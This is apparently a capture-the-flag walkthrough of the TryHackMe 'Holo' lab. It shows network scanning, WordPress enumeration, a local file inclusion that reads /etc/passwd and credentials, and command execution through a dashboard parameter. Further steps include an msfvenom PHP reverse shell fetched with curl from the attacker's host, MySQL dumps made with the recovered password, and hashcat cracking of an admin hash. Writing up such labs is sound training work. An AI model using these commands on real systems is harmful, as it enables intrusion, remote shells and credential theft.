Hololive THM

Lets start with scanning the network

Let's run a ping sweep on the initial networks

sudo nmap -sn -n 10.200.108.0/24 192.168.100.0/24 -oA ping_sweep

• While looking at the output we may see that that the subnet of 192.168.100.0/24 all hosts are alive this must be some kind of firewall issue

• While looking at the 10.200.108.0/24 subnet we can see the following to hosts are alive

Nmap scan report for 10.200.108.33
Host is up (0.29s latency).
Nmap scan report for 10.200.108.250
Host is up (0.29s latency).

Lets get a feel for what these hosts are doing

sudo nmap -sCV -A -oA initial_10.200.108.x_subnet_scan 10.200.108.33 10.200.108.250

results

10.200.108.250

Nmap scan report for 10.200.108.250
Host is up (0.29s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:c7:ac:e2:a2:71:39:39:c4:0b:fa:8d:be:c4:9c:f9 (RSA)
|   256 4b:db:80:6e:e2:49:a0:e1:65:d7:84:a6:ae:65:8a:94 (ECDSA)
|_  256 88:5a:24:b8:ea:f8:67:9b:1f:9c:c7:72:fc:dc:21:85 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=1/19%OT=22%CT=1%CU=36098%PV=Y%DS=1%DC=T%G=Y%TM=65AA056
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=FE8
OS:8%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   295.55 ms 10.200.108.250

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 57.45 seconds

what can wee see

• Looks like a Ubuntu machine

• SSH in enabled

10.200.108.33

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-19 00:14 EST
Nmap scan report for 10.200.108.33
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 54:fb:cb:1b:f1:04:35:0f:ac:84:4d:f5:98:4d:be:d6 (RSA)
|   256 e6:0d:65:d1:26:a8:e2:83:7b:d7:9e:7e:31:c0:ec:96 (ECDSA)
|_  256 12:b6:90:b2:a2:c0:93:f7:80:f9:19:4f:86:95:00:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: holo.live
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-generator: WordPress 5.5.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=1/19%OT=22%CT=1%CU=30376%PV=Y%DS=2%DC=T%G=Y%TM=65AA056
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=108%GCD=2%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=F4B
OS:3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   295.56 ms 10.50.104.1
2   294.53 ms 10.200.108.33

What can we see

• Ubuntu machine

• This looks to be a web server

  • title name: holo.live will add this to our hosts file

  • Apache web server 2.4.29

  • Looks like it is utilizing WordPress 5.5.3

  • we have a list of dissallowed entries

/var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php

• Notice the path files /var/www/wordpress could be an indication for LFI

• SSH is enabled on the machine

Lets run a full port nmap scan of both targets

sudo nmap -p- -sV -oA full_port_10.200.108.x_subnet_scan 10.200.108.33 10.200.108.250

• we do notice something interesting within a full port scans

10.200.108.33

Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache/2.4.29 (Ubuntu)
33060/tcp open  mysqlx?

• Looks like we have a mysqlx server running on the web server

10.200.108.250

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
1337/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Looks like we have Node.js Express framework running

10.200.108.33:80 holo.live

When we navigate to holo.live we can see the following

Noticed when we type "holo.live" within the url bar it redirected me to www.holo.live

I want check for any virtual host routing for this we can use wfuzz

wfuzz -c -f sub-fighter -u '10.200.108.33' -H 'Host:FUZZ.holo.live' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -s 20 

• Now if we notice in the results we have alot off 200's codes, not all of these are a separate vhost, we want to look for anomalies that stick out

results

• Notice the chars, word, and lines value, they are different from the rest of the requests, id say these are our vhosts on the server and we can add these to a hosts file

wpscan --url 10.200.108.33 --enumerate ap --plugins-detection aggressive --api-token <api_token> > wpscan.out

results that seem interestings

Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.5.8
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209

10.200.108.33:80 (www.holo.live)

navigatting to the web page we can see the following

Lets run feroxbuster and see if we can find anything interesting

feroxbuster -u http://www.holo.live -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_www_holo_live_http.txt -x php

• nothing to interesting

Lets check out these vhosts

dev.holo.live

• Looks like they are currently working on an updated website

Lets run feroxbuster and see if we can find anything

feroxbuster -u http://dev.holo.live -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dev_dirs_http.txt -x php

we do find an interesting php function

200      GET        0l        0w        0c http://dev.holo.live/img.php

Looking in the page's source we can see the img.php function is used to retrieve images from the /images directory

Lets see if we ca abuse this function, maybe cat out the /etc/passwd file

our browser download the img.php function, but it actually contains the /etc/passwd contents

admin.holo.live

Lets check the robots.txt

• Looks like we can utilize that lfi we found earlier and grab some creds

dev.holo.live

looks like we both a set of credentials for the db and a username

admin:DBManagerLogin!
gurag

for good measures i want to see what the other dissallowed entries can show us

http://dev.holo.live/img.php?file=/var/www/admin/dashboard.php

we can see a some what rendered dashboard

we can see the version in the page source

• couldnt find anything interesting

Lets see if we can use the credentials we found to login into the admin.holo.live

• it works

• Not much in the way of functionality here, lets go back to our lfi

if we look at the page source of

view-source:http://dev.holo.live/img.php?file=/var/www/admin/dashboard.php

• we do see somehitng interesting

essentially what this block of php code is telling us

if dashboard.php?cmd=NULL; execute on the system "cat /tmp/Views.txt"

Now by default the admin dash board is not passing any data to the function dashboard.php, but what if

dashboard.php?cmd=whoami

we should gett code execution on the back end

lets try

• woohoo we have code execution, Now lets set up a php reverse-shell and see if we can establish a reverse-shell to 10.200.108.33

1. Lets utilize msfvenon to generate a php reverse-shell

msfvenom -p php/reverse_php LHOST=10.50.104.129 LPORT=9001 -o shell.php

1. we need to find a directory we can write to

find / -type d -writable

1. Lets use curl to download our rev.php onto the system

curl http://10.50.104.129:80/shell.php -o /var/www/wordpress/shell.php

1. Now we should be able to execute it and gain a reverse-shell on the system

php /var/www/wordpress/rev.php

• we do get a shell as www-data but it is short lived

Lets see if we can dump the mysql databases

http://admin.holo.live/dashboard.php?cmd=mysqldump%20--host=127.0.0.1%20-u%20admin%20-p%27DBManagerLogin!%27%20--all-databases

lets list the databases

mysql -h 127.0.0.1 -u admin -p'DBManagerLogin!' -e 'SHOW DATABASES;'

Lets list the tables in the wordpress database

mysql -h 127.0.0.1 -u admin -p'DBManagerLogin!' -e 'SHOW TABLES;' wordpress

Lets dump the wp_users table

mysqldump -h 127.0.0.1 -u admin -p'DBManagerLogin!' --opt wordpress wp_users

Looks like we found the user admin and there hashed password

Lets see if we can crackit

$P$BNIIemIQlkZoVqK/XIqOlcpNToFoIu0

• looks like a PHPASS hash

lets see if we can crack it using hashcat

hashcat -m 400 admin_hash /usr/share/wordlists/rockyou.txt